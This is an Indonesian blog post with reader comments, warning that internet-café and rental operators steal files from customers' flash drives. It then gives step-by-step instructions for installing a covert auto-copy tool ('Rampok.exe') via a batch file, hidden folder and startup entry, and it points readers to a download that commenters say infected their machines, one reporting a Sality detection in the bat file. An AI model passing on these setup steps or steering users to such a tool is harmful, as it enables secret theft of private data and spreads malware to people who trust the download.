Aplikasi Pencuri Data Otomatis ( Hati hati mencolokkan Flashdisk di Warnet / Rental )


Maraknya peredaran video atau “file pribadi” ( yang tanpa sengaja ) tidak luput dari ulah sebagian operator warnet, rental bahkan tukang cuci cetak foto, modusnya yaitu dengan mencuri file di flashdisk kita secara diam diaam . Sangat menyakitkan apalagi jika file pribadi atau rahasia organisasi/kantor tercuri dan tersebar ke pihak2 yang tidak bertanggung jawab. Banyak cara untuk mencuri data kita, untuk sementara yang saya tahu dengan cara cara seperti ini :

yang pertama dengan menggunakan perintah dos ( filenya berformat *.bat ) yang cukup dengan sekali klik maka semua file akan tercopy tanpa konfirmasi. Biasanya di meja/komputer operator warnet/rental/studio foto ( ini yang pernah saya alami disebuah rental komputer, video2 anak saya di colong gak pake ngomong ).

yang kedua , modusnya yaitu dengan cara menambah aplikasi di komputer yang disewakan, dengan program ini kita bisa meng-copy secara diam2 seluruh isi flash disk milik orang lain ke folder tersembunyi di komputer.

Caranya ( kok saya jadi ngajarin ) :

1. Buat dulu secara manual folder di “C:\system\error” [wajib disitu walaupun

bukan drive system–tulisan wajib sama persis]

2. Ekstrak .rar program (dengan winrar atau yang sejenis) difolder yang

tersembunyi. Klik/buka file INSTAL.BAT, kemudian jalan kan program ( namanya Rampok.exe ) dengan double klik. Liat tampilan dipojok kanan bawah bahwa program telah aktif .

3. Tiap kali ada flashdisk atau kamera atau mp3/mp4 player yang dicolokkan akan

OTOMATIS (TANPA TANDA & PEMBERITAHUAN) tercopy ke “C:\system\error” [akan

membuat subfolder dibawahnya “tgl/bln/tahun/series”, contohnya “20-06-2007_184215”

.

Catatan :

– Copy ditiap komputer / warnet bila ingin mendapatkan tiap data.

– Bila ingin otomatis jalan tiap komputer dijalankan, masukkan dalam list start-up (via program files/startup atau Regedit)

Penasaran…???

Sebenarnya banyak program semacam ini tetapi saya coba menunjukkan salah satunya, download programnya disini ( ingat…!!! jangan untuk mencuri data orang. jika anda melakukan pencurian data, maka tanggung jawabnya dunia akherat ).

Aplikasi ini BERBAHAYA bagi kesehatan komputer anda

dimodif dari ( http://www.catatan-marcel.co.cc/ )

8 Tanggapan

  1. thx udah share

  2. Info yang bagus, jadi tahu nih. kok sampai ada software curi otomatis, Wah… aneh2 saja.

    Mending minta orangnya langsung…

  3. knp kmputer sya jd banyak virus nya…. stlah instal rampok ini…
    tlog bntuan nya..gmna cara uninstalnya?
    sy mnta solusinya

    COKIE :
    saya tidak merekomendasikan aplikasi rampok tersebut, di awal proses instalasi ( sebelum klik rampok.exe ) khan sudah saya kasih warningnya..

  4. wah… haruS hati2 nih.. mkasih mas artikelnya sgt brmanfaat.. jadi bz lebih hati2..

  5. tolong sya mnta solusinya…

  6. skrag saya jdi tdk bisa bkerja…
    sya kurag tau mslh software kmputer…
    jd tlong bantuan’nya!!

    COKIE :
    coba di scan pake antivirus , saya juga coba instal memang dan tidak terjadi apa2 dengan komputer nya, kalo cuma pesan error yang muncul terus menerus ( silahkan direstart aja , ntar juga ilang ) , saya mohon maaf itu hanya keisengan saya memperingatkan agar TIDAK GAMPANG TERJEBAK dengan aplikasi2 yang semacam ini . karena banyak software2 sejenis yang tersebar dan lebih berbahaya kalo dicoba.

  7. Trims ya …nambah ilmu..

  8. PERINGATAN, file jangan di download, di file bat nya terdeteksi virus sality oleh kaspersky, dan klo udah diextract file bat tsb tidak bs dihapus…Sialan emang..nambahin kerjaan aja!!!

Tinggalkan komentar